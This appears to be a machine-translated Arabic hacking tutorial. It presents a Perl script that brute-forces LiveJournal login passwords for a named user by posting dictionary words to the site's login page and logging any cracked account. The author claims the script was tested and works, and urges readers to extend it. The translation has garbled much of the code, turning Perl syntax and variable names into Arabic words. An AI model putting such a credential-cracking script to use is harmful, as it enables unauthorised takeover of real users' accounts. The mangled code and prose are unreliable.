Set-Cookie: ljsession = ws: fuck: 1: fDjwfWdsC؛ المسار = / ؛ HttpOnly

لا شيء يمنعك من التحقق مما إذا كان العنوان "هـ
اسم المستخدم وإذا كان هناك - إنهاء
القوة الغاشمة والكتابة إلى حساب السجل.

من الناحية النظرية ، تمت كتابة القوة الغاشمة. اليسار
ضع هذا موضع التنفيذ. وية والولوج
استخدمت لغة Perl للترميز ، لأنني أعرف ذلك
اللغة هي بالفعل السنة الثالثة وهي مناسبة تمامًا
لأفكاري. أبحث في المسمار الخاص بي
النمط الغاشم ، وجدت القوة الغاشمة MIME لحسابات httpd ،
التي وصفتها ذات مرة في هذا الموقع :).
من خلال تغييره قليلاً ، حصلت على شهادة كاملة
تعلم القوة الغاشمة. عيبه الوحيد
هو خيط واحد ، ولكن لمثل هذا
مبرمج رائع مثلك ، أعتقد أنه لن يكون كذلك
مشكلة كبيرة :). يبقى لك
تنفيذ multithreading ، أو
استخدام الإصدار التجريبي الخاص بي ؛).

إذن ، الكود الفعلي:

#! / usr / bin / perl
استخدام IO :: Socket ؛ ##استخدم مآخذ
$|++; ## سوف نزيد
التخزين المؤقت

$ server = "www.livejournal.com" ؛ ##
وضعنا
الخادم
المنفذ $ = "80" ؛ ## و
المنفذ 🙂

$ logfile = "cracked.log" ؛ ##
هنا
كتابة حساب مخترق

الكلمات $ = "bigdict.txt" ؛ ## لنا
مفردات كبيرة من خلالها
القوة الغاشمة

المستخدم $ = "اللعنة" ؛ ## مستخدم،
الذي نكسر

$ dir = "/ login.bml" ؛ ## النصي،
الذي يعيد الحالة

افتح (ملف، "$ words") أو طباعة يموت "$! \ n"؛
@ البيانات = ;
[بريد إلكتروني محمي];
إغلاق الملف؛ ##
دعونا فتح
القاموس ، اكتب كل الكلمات في مصفوفة

foreach $ pass (data) (##
حلقة أكثر
كل كلمة

أنا ++ دولار ؛
اقضم بصوت عالي ($ pass) ؛
$ socket = IO :: Socket :: INET-> new (PeerAddr => $ server ،
PeerPort => $ المنفذ ،
بروتو => برنامج التعاون الفني)
or die print "غير قادر على الاتصال بـ $ server: $ port \ n"؛ ##

قم بإنشاء اتصال بـ livejournal.com

$ socket-> autoflush (1) ؛ ##

قطعنا التخزين المؤقت (فقط في حالة ، لأن
بشكل افتراضي يتم قطعه)

$ post = "user = $ user & password = $ pass &"؛ ##

نحن نشكل طلب POST

len = الطول (بالدولار الأمريكي) ؛
لين دولار + = 1 ؛ ##
أوجد الطول
استعلام (عبارة + \ r \ n)

طباعة $ socket "POST $ dir HTTP / 1.1 \ r \ n"؛
طباعة $ socket "المضيف: www.livejournal.com \ r \ n" ؛؛
print $ socket "نوع المحتوى: application / x-www-form-urlencoded \ r \ n"؛
print $ socket "Connection: Close \ r \ n"؛
print $ socket "Content-Length: $ len \ r \ n"؛
طباعة $ socket "\ r \ n $ post \ r \ n"؛

## أرسل إلى المقبس
رأس طويل

socket-> recv ($ answer، 1024)؛ ## و
قراءة العودة = 1 كيلو بايت من البيانات

إذا كان ($ answer = ~ / \: $ user \: /) (
افتح (logf، ">> $ logfile") أو طباعة "$! \ n"؛
سجل الطباعة "$ user: $ pass is OK !!! \ n"؛
إغلاق السجل
طباعة "$ user: $ pass is OK !!! \ n"؛
خروج 0 ؛ ## إذا كان يحتوي على
سطر من النموذج: المستخدم: - كتابة سجل وإنهاء الغاشمة.

} ## خلاف ذلك ، تحقق
كلمة المرور التالية

}

هذه هي القوة الغاشمة بأكملها. تم التحقق
شخصيًا من قبلي - يعمل مع اثارة ضجة :). لكن الحسابات
لن أعطيك للتحقق - أنا جشع ؛) ، والد الزوج
بمفردهم. كما ترى ، كل شيء سهل التنفيذ ،
إذا كنت تريد فقط.